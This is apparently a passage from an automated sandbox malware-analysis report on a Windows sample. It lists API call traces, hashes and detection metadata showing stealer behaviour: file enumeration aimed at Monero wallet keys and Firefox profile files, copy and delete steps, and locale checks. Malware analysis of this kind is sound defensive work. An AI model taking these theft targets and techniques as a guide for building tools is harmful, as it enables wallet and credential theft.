                    • FindFirstFileA.KERNEL32(?,?), ref: 00963EDA
                    • StrCmpCA.SHLWAPI(?,00970FAC), ref: 00963F08
                    • StrCmpCA.SHLWAPI(?,00970FB0), ref: 00963F1E
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0096406C
                    • FindClose.KERNEL32(000000FF), ref: 00964081
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\%s$h[$[
                    • API String ID: 180737720-3744901406
                    • Opcode ID: 722d6d20ed1474af35b8b392265556994355e3c97c097a9b78eb76675e6b0dc0
                    • Instruction ID: 0ffccc483d920072faf9a65f479931690a27ce10449ee97d74a50ea2388fe884
                    • Opcode Fuzzy Hash: 722d6d20ed1474af35b8b392265556994355e3c97c097a9b78eb76675e6b0dc0
                    • Instruction Fuzzy Hash: 8B5158B2910218ABCB24EBB0DD85FEA737CBB84300F448589B65997150EF75EB85CF91
                    APIs
                    • wsprintfA.USER32 ref: 0095ED3E
                    • FindFirstFileA.KERNEL32(?,?), ref: 0095ED55
                    • StrCmpCA.SHLWAPI(?,00971538), ref: 0095EDAB
                    • StrCmpCA.SHLWAPI(?,0097153C), ref: 0095EDC1
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0095F2AE
                    • FindClose.KERNEL32(000000FF), ref: 0095F2C3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\*.*
                    • API String ID: 180737720-1013718255
                    • Opcode ID: 54350a99be87fd4b61c72b2c09f8ec691f1d6308da22712825f557d222f3d7eb
                    • Instruction ID: e397c0976e7cd5add79a5e82c9b1b57d4712bd5780d71b5d3fd67a0c17ced21b
                    • Opcode Fuzzy Hash: 54350a99be87fd4b61c72b2c09f8ec691f1d6308da22712825f557d222f3d7eb
                    • Instruction Fuzzy Hash: 35E1B0729111189ADB58FB60DD92FEE7338AF94340F404599B50A73092EF306F8ACF96
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009715B8,00970D96), ref: 0095F71E
                    • StrCmpCA.SHLWAPI(?,009715BC), ref: 0095F76F
                    • StrCmpCA.SHLWAPI(?,009715C0), ref: 0095F785
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0095FAB1
                    • FindClose.KERNEL32(000000FF), ref: 0095FAC3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID: prefs.js
                    • API String ID: 3334442632-3783873740
                    • Opcode ID: 1ba81a1b221e0f53d02410b9ab9bf2f35772c60b9b5e0f7f7df5a4e8019d670e
                    • Instruction ID: 8a6e36f0c468600732a4f305ba204d59424842054df753ac92c2c60fb6b4bc8b
                    • Opcode Fuzzy Hash: 1ba81a1b221e0f53d02410b9ab9bf2f35772c60b9b5e0f7f7df5a4e8019d670e
                    • Instruction Fuzzy Hash: 78B142719001089BDB24FF64DD96FEE7379AFD4300F5085A9A90AA7191EF306B49CF92
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0097510C,?,?,?,009751B4,?,?,00000000,?,00000000), ref: 00951923
                    • StrCmpCA.SHLWAPI(?,0097525C), ref: 00951973
                    • StrCmpCA.SHLWAPI(?,00975304), ref: 00951989
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00951D40
                    • DeleteFileA.KERNEL32(00000000), ref: 00951DCA
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00951E20
                    • FindClose.KERNEL32(000000FF), ref: 00951E32
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                    • String ID: \*.*
                    • API String ID: 1415058207-1173974218
                    • Opcode ID: f069a90a51432392f73a7b113848906f0d53d4be52f2fb92a382e8d43080dbd4
                    • Instruction ID: 14277b01a44a781da5e4ff5ec0865bbe12d8419d101e48b9702a403f64d446a0
                    • Opcode Fuzzy Hash: f069a90a51432392f73a7b113848906f0d53d4be52f2fb92a382e8d43080dbd4
                    • Instruction Fuzzy Hash: 8212DA719101189BDB19FB60DCA6BEE7378AF94340F5045A9B50A73091EF706F89CFA2
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00970C2E), ref: 0095DE5E
                    • StrCmpCA.SHLWAPI(?,009714C8), ref: 0095DEAE
                    • StrCmpCA.SHLWAPI(?,009714CC), ref: 0095DEC4
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0095E3E0
                    • FindClose.KERNEL32(000000FF), ref: 0095E3F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                    • String ID: \*.*
                    • API String ID: 2325840235-1173974218
                    • Opcode ID: b5004ff547b23a0e91cce983c9e84daab8f37e28e45e6772d761343f6e39ea11
                    • Instruction ID: 3d950f5f929e896ae4527ec3b845a3e7df086bc76cf648157917796607a9ba42
                    • Opcode Fuzzy Hash: b5004ff547b23a0e91cce983c9e84daab8f37e28e45e6772d761343f6e39ea11
                    • Instruction Fuzzy Hash: 21F18D719141189ADB19FB60DD96BEE7338BF94300F90419AA51A73091EF306F8ACF66
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009714B0,00970C2A), ref: 0095DAEB
                    • StrCmpCA.SHLWAPI(?,009714B4), ref: 0095DB33
                    • StrCmpCA.SHLWAPI(?,009714B8), ref: 0095DB49
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0095DDCC
                    • FindClose.KERNEL32(000000FF), ref: 0095DDDE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID:
                    • API String ID: 3334442632-0
                    • Opcode ID: 98039049768c48f0826c953321c7109451a69028291cb41db8938d1a3084d094
                    • Instruction ID: 1e9204312d99a745d9b2f3ad10e84008b321361185289cf8f071c99691c39518
                    • Opcode Fuzzy Hash: 98039049768c48f0826c953321c7109451a69028291cb41db8938d1a3084d094
                    • Instruction Fuzzy Hash: 5A911F729001049BCB14FFB0ED96AED737DABC4341F408669B90AA7191EE349B5DCF92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0y[?$4{\g$4{\g$J[g]$L:<y$P7o$U<o$rD~[$_}>
                    • API String ID: 0-88562457
                    • Opcode ID: 68b5f889540f5f21ae6f3ee60d442637be324c2ce8376b8c09dce6d2d3d49ec2
                    • Instruction ID: cf231bfbbfbc89b1c4881faa0547e49246e2cba83b5080be7067c01b4e7b3e83
                    • Opcode Fuzzy Hash: 68b5f889540f5f21ae6f3ee60d442637be324c2ce8376b8c09dce6d2d3d49ec2
                    • Instruction Fuzzy Hash: C7B2F5F360C2049FE3046E2DEC8567AB7E9EFD4720F1A893DEAC483744EA3558458697
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: ))S$4B|$B$;;$B{g$\qr%$mTi_$ps$tl_a
                    • API String ID: 0-789589915
                    • Opcode ID: ed771dd54cb6c0ebbff0c8a851ed7253d04862f88271955feed8b95726c51c54
                    • Instruction ID: 536ba0c32cec83f039860f548e52e93695ac4b52fce2ee7f42a72784907742e2
                    • Opcode Fuzzy Hash: ed771dd54cb6c0ebbff0c8a851ed7253d04862f88271955feed8b95726c51c54
                    • Instruction Fuzzy Hash: 4BB229F3A0C2049FE7046E29EC8567AB7E9EF94720F1A893DE6C5C3344E63598058797
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                    • GetKeyboardLayoutList.USER32(00000000,00000000,009705AF), ref: 00967BE1
                    • LocalAlloc.KERNEL32(00000040,?), ref: 00967BF9
                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00967C0D
                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00967C62
                    • LocalFree.KERNEL32(00000000), ref: 00967D22
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                    • String ID: /
                    • API String ID: 3090951853-4001269591
                    • Opcode ID: 4d1630ac4a02a39c813a6e744f1b56403d8f90abb661ff33d4b86dc1a6bce810
                    • Instruction ID: 091753471b30868d960313cc435664888ba7c0b2b9638e47195954635d7869ee
                    • Opcode Fuzzy Hash: 4d1630ac4a02a39c813a6e744f1b56403d8f90abb661ff33d4b86dc1a6bce810
                    • Instruction Fuzzy Hash: C3413971940218ABCB24DB94DC99BEEB3B8FF84704F204199E10973290DB342F85CFA1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                     • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: y_$!nv~$"Rw$1S]$PIp7$iJD$k=
                    • API String ID: 0-2287754121
                    • Opcode ID: 6cd6c48ad3ce051248bad0de97db0cb90584cd551ec1c33b18d85ad9cb182cd0
                    • Instruction ID: e02e15d4bb34a3642f75c0275fdfe9728bfdbb47c549b34830004e1c312862b7
                    • Opcode Fuzzy Hash: 6cd6c48ad3ce051248bad0de97db0cb90584cd551ec1c33b18d85ad9cb182cd0
                    • Instruction Fuzzy Hash: E3B227F36086009FE308AE2DEC8577AB7E6EFD4320F1A853DE6C587744E93598058697
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                     • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: P}/$#V"D$Eiwl$M0gu$Vgs$`y}$~'?
                    • API String ID: 0-138319148
                    • Opcode ID: de3ddef64288f782d5d58b7cbcd7e673ba730f08c903e211cb5f6fd0bc1339f5
                    • Instruction ID: acab6c6ca5fe38efc6f3810c235b804aaacd87b0f7a13d0cb9687fa2c7519e4f
                    • Opcode Fuzzy Hash: de3ddef64288f782d5d58b7cbcd7e673ba730f08c903e211cb5f6fd0bc1339f5
                    • Instruction Fuzzy Hash: 22B2F7F3A08200AFE304AE29EC8567AFBE5EF94720F1A493DE6C5C3744E63559018797
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                     • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: %Mw}$1d|$[Q@{$c[~O$d9/l$Sw~$ah;
                    • API String ID: 0-2127843254
                    • Opcode ID: c63ce694968073630bcee3618c55e1d89cf4a8d8473907771d8b376f42620cd9
                    • Instruction ID: 23c842c6d4bdd9f5d060beab4b7c100ef0ca09a9b6bd64eb2c1b190901f7f249
                    • Opcode Fuzzy Hash: c63ce694968073630bcee3618c55e1d89cf4a8d8473907771d8b376f42620cd9
                    • Instruction Fuzzy Hash: 2DB218F3A0C2049FE704AE2DDC8567AFBE9EF94720F1A853DEAC483744E63558058697
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                     • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 4}$K+r7$MO/C$d?"$q3lW$|>s>$a?_
                    • API String ID: 0-927511288
                    • Opcode ID: 69e9f1b40ed5a30701285efe9fd3fbcda76edb021fe885697228786193f13b1b
                    • Instruction ID: 3eaf1285ef681995abe6446d3823eca778d198d3618044ed2157b2275fa2fb8b
                    • Opcode Fuzzy Hash: 69e9f1b40ed5a30701285efe9fd3fbcda76edb021fe885697228786193f13b1b
                    • Instruction Fuzzy Hash: 58B219F3A082149FE304AE2DDC8567AFBE9EF94720F1A493DE6C5C7344E93598018796
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00970D73), ref: 0095E4A2
                    • StrCmpCA.SHLWAPI(?,009714F8), ref: 0095E4F2
                    • StrCmpCA.SHLWAPI(?,009714FC), ref: 0095E508
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0095EBDF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                     • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                    • String ID: \*.*
                    • API String ID: 433455689-1173974218
                    • Opcode ID: f79b9658a7bc358fb73a8bbbf483e5017b7b1de0c4f85bfcb4f6b61f08e6d61b
                    • Instruction ID: 90e3a4d72b57a637d0b18a4197533bf50e35b09881c05a56ffea24bb609c76ee
                    • Opcode Fuzzy Hash: f79b9658a7bc358fb73a8bbbf483e5017b7b1de0c4f85bfcb4f6b61f08e6d61b
                    • Instruction Fuzzy Hash: 4D121D729101189ADB18FB60DD96FEE7339AFD4300F5045A9B50AB7091EE346F49CFA2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                     • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0~T$@N_"$eV^9$|*A$<_?
                    • API String ID: 0-2461846571
                    • Opcode ID: e46f49aa01ab8449c7e77d907c8cbe911ebda1d6128841896545acb627f1796e
                    • Instruction ID: 778c2404e5c646ef02b05d12ed3b96a2b3e4cc46a3715057d96d171bdaad77fc
                    • Opcode Fuzzy Hash: e46f49aa01ab8449c7e77d907c8cbe911ebda1d6128841896545acb627f1796e
                    • Instruction Fuzzy Hash: 04B238F3A0C3049FE308AE2DEC8567AB7E9EF94720F16853DE6C5C3744EA3558058696
                    APIs
                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0095C871
                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0095C87C
                    • lstrcat.KERNEL32(?,00970B46), ref: 0095C943
                    • lstrcat.KERNEL32(?,00970B47), ref: 0095C957
                    • lstrcat.KERNEL32(?,00970B4E), ref: 0095C978
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                     • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
